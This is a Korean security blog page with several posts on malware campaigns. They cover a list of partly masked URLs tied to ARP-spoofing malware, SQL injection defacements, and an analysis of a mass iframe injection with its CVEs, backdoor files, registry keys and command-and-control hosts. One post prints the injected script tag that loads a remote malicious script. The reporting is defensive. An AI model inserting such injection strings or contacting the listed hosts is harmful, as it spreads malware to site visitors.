ARP Spoofing 공격을 통해 엄청난 피해가 연일 계속되고 있습니다. 아래의 웹사이트에서는 최근에 유포되고 있는 경유 URL에 대한 정보를 공개하고 있습니다. 또한, HTML, JS, ASP와 같이 경유 웹페이지의 분석정보도 함께 제공하고 있습니다.


지난 10월 23일까지 발견된 내역은 아래와 같습니다.

발견일 악성 URL
2010-10-23 hxxp://www.shrono.com/xx/img.js
2010-10-23 hxxp://121.254.235.xx/H.asp
2010-10-23 hxxp://a5b.xx/n.js
2010-10-23 hxxp://www.zzyaya.com/xx/img.js
2010-10-22 hxxp://www.3emath.com/~~~/img.js
2010-10-22 hxxp://125.141.196.1**/F.asp
2010-10-21 hxxp://www.thwg08.com/xx/img.js
2010-10-19 hxxp://www.igo88.com/xxx/img.js
2010-10-17 hxxp://222.231.57.xxx/r.asp
2010-10-16 hxxp://smaug.xx/portfoliox/tutorials.php
2010-10-16 hxxp://58.120.227.xxx/F.asp
2010-10-16 hxxp://789.fanli8.xx/tj.html?zhizun
2010-10-15 hxxp://www.sxsia.org.xx/images/xxxxx.js
2010-10-13 hxxp://www.xatarena.xxx/images/img.js
2010-10-12 hxxp://www.adw95.xxx/b.js
2010-10-11 hxxp://318x.xxx/
2010-10-11 hxxp://210.109.97.XX/TT.asp
2010-10-11 hxxp://121.78.116.XX/TT.asp
2010-10-10 hxxp://www.lancang-mekong.xxx/uploadfile/img.js
2010-10-09 hxxp://www.aspder.xxx/1.js
2010-10-09 hxxp://kr.nnqc.xxx/cs.js
2010-10-08 hxxp://b.mm861.xxx/images/1.js
2010-10-08 hxxp://www.gdfreeway.xxx/js/img.js
2010-10-07 hxxp://118.103.28.XXX/R.asp
2010-10-07 hxxp://211.234.93.XXX/U.asp
2010-10-07 hxxp://175.124.121.XX/time.js
2010-10-07 hxxp://www.xhedu.xxx/js/img.js
2010-10-07 hxxp://211.234.93.XXX/U.asp
2010-10-06 hxxp://3god.xxx/c.js
2010-10-06 hxxp://318x.xxx
2010-10-06 hxxp://222.234.3.XXX/hh.asp
2010-10-06 hxxp://www.xhedu.xxx/
2010-10-05 hxxp://www.XXXXcollege.co.kr/zboard/data/yahoo.xx
2010-10-04 hxxp://iopap.upperdarby26.xxx/GUI.js
2010-10-04 hxxp://118.103.28.XXX/R.asp
2010-10-04 hxxp://wefd4.xx/
2010-10-04 hxxp://211.115.234.XXX/P.asp
2010-10-04 hxxp://211.233.60.XX/h.asp
2010-10-04 hxxp://uc.wooam.xxx/cp/w3.js
2010-10-04 hxxp://www.e0570.xxx/images/img.js
2010-09-30 hxxp://203.206.159.XXX/image/head.js
2010-09-30 hxxp://www.dnf666.xxx/u.js
2010-09-29 hxxp://mysy8.xxx/1/1.js

특히, 아파트나 회사와 같이 여러 개의 컴퓨터가 하나의 네트워크로 엮여 있는 경우에는 한 컴퓨터에 ARP Spoofing에 관련된 웜이 감염되더라도 전체 사용자 (네트워크)에 모두 영향을 미치게 됩니다.

따라서, 모든 컴퓨터에 대해 최신 보안 패치를 했는지 확인해야 하며, 신뢰할 수 있는 컴퓨터 백신을 사용하여 감염된 경우 치료해야 합니다. 안연구소 등에서는 전용 백신을 배포하고 있으므로 이를 참고하는 것도 좋습니다.

감사합니다..

reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus
    아무런 이름을 밝히지 않고 해킹하는 한 단체에서는 최근 다음에 해킹할 웹사이트를 공개적으로 언급하면서 사람들의 관심을 사고 있습니다.

    이 웹사이트는 MPAA(Motion Picture Association of America)에서 운영하는 것으로 저작권에 관한 정보를 알리고 있습니다.

    <그림 1. 웹사이트가 조작된 화면>

    공격 방식에 대해서는 여러가지 의견이 제시되고 있지만, 이 중에서 가장 신뢰할 수 있는 방식이 바로  SQL Injection 취약점이며, 아래 사진을 참고하십시오.

    <그림 2. SQL Injection 취약점이 있는 링크>

    SQL Injection 취약점을 통해 서버 장악, 데이터베이스 변조 및 조작, 정보 누출 등이 발생할 가능성이 있습니다.

    국내에서도 수많은 사이트가 SQL Injection 취약점에 노출되어 있습니다. 특히, Mass SQL Injection 취약점을 통해 많은 컴퓨터 사용자들이 인터넷을 이용하다가 감염되는 사례가 증가하고 있으므로, 이 문제점을 해결하는데 많은 노력을 기울여야 합니다.

    감사합니다.

    출처: http://news.softpedia.com/news/SQL-Injection-Used-to-Deface-Copyprotected-Others-Might-Follow-161316.shtml

    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus
      시만텍, 소포스, 카스퍼스키와 같은 유명한 보안 기업에서는 일정한 기간 즉, 분기나 반기마다 보안 정책이나 뉴스, 트렌드에 대한 보고서를 정기적으로 발간합니다.

      최근 발간한 시만텍의 메시지랩스의 보고서에 따르면 악성 코드를 유포하는 사이트의 약 90%가 정상적인 웹사이트인 것으로 밝혀져 충격을 주고 있습니다.

      기존의 경향대로라면 해커들이 고유한 목적으로 사용하기 위해 도메인을 생성하고 이를 이용하여 악성코드를 다운로드하거나 공격하게 하는 일련의 행동을 보여왔습니다. 하지만, 이렇게 도메인은 생성하게 되는 경우에는 금방 탄로가 나게 되어 차단되는 단점이 있다고 볼 수 있습니다.

      하지만, 최근 월드컵 웹사이트의 해킹 건과 같이 정상적인 웹사이트에 악성코드를 유포하는 페이지나 스팸 메시지를 보여주는 페이지를 은밀하게 업로드하여 이용하는 행태가 더욱 증가하고 있습니다.

      이렇게 악성 코드를 유포하게끔 하기 위한 공격 방식은 XSS(Cross-site scripting), SQL 인젝션, FTP 정보 누출 등을 이용하는 것으로 알려지고 있습니다.

      이중 XSS와 SQL 인젝션은 웹 취약점의 가장 대표적인 사례로 손꼽이고 있으며, 아직까지도 제대로 해결되지 못하고 있습니다. 물론, 이 취약점들은 악성 코드를 대규모로 유포시키는 Mass SQL Injection 취약점을 포함하고 있습니다.

      FTP에 관련된 부분으로는 계정정보가 누출되거나, ACL을 제대로 관리하지 못하는 경우에 발생하는 것으로 예상됩니다.

      감사합니다.



      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus
        외국에 위치하고 있는 보안 기업인 ScanSafe는 자사의 블로그를 통해 대규모의 SQL 인젝션 공격이 발생했다는 사실을 밝혔습니다.

        블로그에 따르면 이번 주 초부터 발생한 공격으로 월스트리트 저널, 예루살렘 포스트 등을 포함한 약 7천여개의 웹사이트가 침해되었습니다.

        공격은 이미 널리 알려져 있는 SQL 인젝션 취약점을 이용한 것으로 취약점이 있는 서버의 데이터베이스에 아래의 스크립트를 삽입하는 방식으로 진행되었습니다

        script src=http://ww.robint.us/u.js

        이 스크립트는 악성 코드가 포함되어 있는 웹서버에서 PC로 악성 코드를 자동으로 다운로드하도록 하는 것으로 백신이나 보안 패치가 부족한 PC에서 특히 위험합니다.

        한편 이번에 발생한 공격은 윈도우 서버 플랫폼 즉, IIS/ASP.NET 기반으로 개발된 웹사이트를 주 공격대상으로 삼고 있었습니다.

        월스트리트 저널의 경우에는 adicio.com 이라는 제휴 회사의 침해로 인해 WSJ.com 홈페이지의 특정 페이지에 공격이 나타나는 현상이 발생했습니다.

        공격받은 대부분의 웹사이트에서 악성 스크립트는 이미 제거된 상태이지만, 아직까지도 수천개 이상의 사이트들에서는 해결이 되지 않은 상태입니다.

        SQL 인젝션 취약점은 소스 코드에서 입/출력되는 값이 적절한지 검증을 거치지 않아 발생하는 것입니다. 따라서, 소스 수준에서 문제점을 해결해야만 이와 같은 공격으로부터 자유로울 수 있습니다.

        물론, WAF(웹 애플리케이션 파이워월)와 같은 보안 장비(소프트웨어)를 사용할 수 있지만, 새로운 유형의 공격 형태가 나타날 경우에는 또다시 문제가 될 소지가 많습니다. 따라서, 근본적으로 해결을 해야 합니다.

        출처: http://blog.scansafe.com/

        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus
          지난 12월 초, 대규모 SQL 인젝션 공격이 진행되어 약 12만 5천대 이상의 웹서버가 감염되었다는 주장이 제기되었습니다.

            대규모 SQL 인젝션 공격(Mass SQL Injection Attack)이란 "봇넷이나 전문 스캐너 프로그램을 이용하여 무차별적으로 웹사이트를 공격하여 취약한 사이트를 찾아 내어 데이터베이스 등의 데이터를 조작하는 일련의 공격 행위"를 말합니다.
            국내에서는 지난 해 9월부터 10월까지 수십여만 개의 웹 사이트를 해킹당한 바가 있으며 올해에도 여러 번의 공격이 보고되었으나, 국내의 피해가 아주 심하지 않아(!) 언론에 알려지지 않았습니다.

          최근에 발생한 공격은 318x.com 사이트에서 악성 프로그램을 다운로드하는 iFrame 형태로, 구글 검색 결과 약 12만 5천 개 이상 감염되었습니다. iFrame의 공격은 다른 웹페이지로 리디렉트(Redirect)하게 되며 사용자는 이러한 사실을 알아내기 어렵습니다. 

          공격이 진행된 상황은 다음과 같습니다.

          1. 사용자가 조작된 웹 페이지에 방문할 때에 318x.com/a.htm을 방문하도록 iframe으로 만들어진 스크립트가 자동으로 실행됩니다. a.htm 파일에는 두 가지 기능이 숨겨져 있습니다.
          • aa1100.2288.org/htmlasp/dasp/alt.html 에서 두 번째 iframe 코드 로드
          • jt.tongji.linezing.com/1358779/tongji.js 스크립트 로드(추적 목적)


          2. aa1100.2288.org/htmlasp/dasp/alt.html에 포함된 iframe의 기능은 다음과 같습니다.

          • aa1100.2288.org/htmlasp/dasp/share.html로 유도하는 세번째 iFrame 코드 생성
          • js.tongji.inezing.com/1364067/tongji.js 스크립트 로드(위의 스크립트 코드와 다름)
          • img.tongji.linezing.com/1364067/tongji.gif 이미지가 www.linezing.com를 가리키도록 <noscript> 코드 실행

          3. share.html은 공격을 염두로 둔 마스터 파일로 동작합니다. 다수의 스크립트 파일이 포함되어 있으며 사용자의 브라우저, 플래시의 버전 등의 기준에 따라 여러 개의 iFrame 코드들이 구성되어 있습니다.


          문제는 아직까지 이 공격의 목표 또는 직접적인 피해가 나타나고 있지 않습니다. 보안 업계에 따르면 마지막 공격 시점에 사용된 악성 코드에 관련된 스크립트를 모니터링한 결과 일부 코드가 변경되거나 삭제되고, 새로운 스크립트가 추가되고 있다고 합니다. 대부분의 파일은 .jpg 확장자로 위장되어 있지만 스크립트의 경우에는 .js 확장자를 가집니다.

          전체적인 공격 형태가 알려지지는 않았지만, 아래와 같이 같이 PDF 취약점을 이용하는 것으로 다수로 나타났습니다.

          • Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
          • MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
          • Microsoft Office Web Components vulnerabilities described in MS09-043
          • Microsoft video ActiveX vulnerability described in MS09-032
          • Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002


          다음과 같이 PDF 취약점을 이용하는 것으로 나타났습니다.
          이러한 일련의 공격이 성공적으로 이후어진 후에는 Backdoor.win32.Buzus.croo라는 파일을 windowssp.7766.org 사이트에서 비밀리에 다운로드하여 설치합니다. 악성 코드가 설치디면 다음과 같이 루트킷의 형태로 동작하는 파일을 컴퓨터에 설치합니다. 

          • %UserProfile%\ammxv.drv
          • %ProgramFiles%\Common Files\Syesm.exe


          또한, 악성 코드는 컴퓨터에서 시작할 때마다 자동으로 실행되도록 하기 위해 아래와 같이 레지스트리를 변경합니다.

              HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DrvKiller
              HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DrvKiller\Security
              HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\DrvKiller
              HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\DrvKiller\Security

          Backdoor.Win32.Buzus.croo는 121.14.13.136.5:80에 연결을 시도하고 hxxp://dns.winsdown.com/cn/Countdown/count.asp 로 POST 요청을 전송합니다.

          악성 코드는 IRC를 이용하여 원격을 관리하는 형태이며 공격의 목표는 신용카드와 같은 금융 정보를 빼내는 것입니다.

          지난해 9월 이후로 발생하는 대규모 SQL 인젝션 공격은 이제 일반화된 형태로 나타나고 있습니다. 이를 차단하는 방법은 사용자의 입장에서는 보안 패치와 바이러스 백신과 같은 보안 제품을 사용하는 것이며, 웹 관리자의 입장에서는 SQL 인젝션 공격의 원인인 취약점을 해결하는 것입니다. 물론 웹 관리자가 해결한다면 사용자까지 공격이 올 수 없게 되므로 웹 관리자의 주의가 매우 필요합니다.

          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus


            Web Analytics Blogs Directory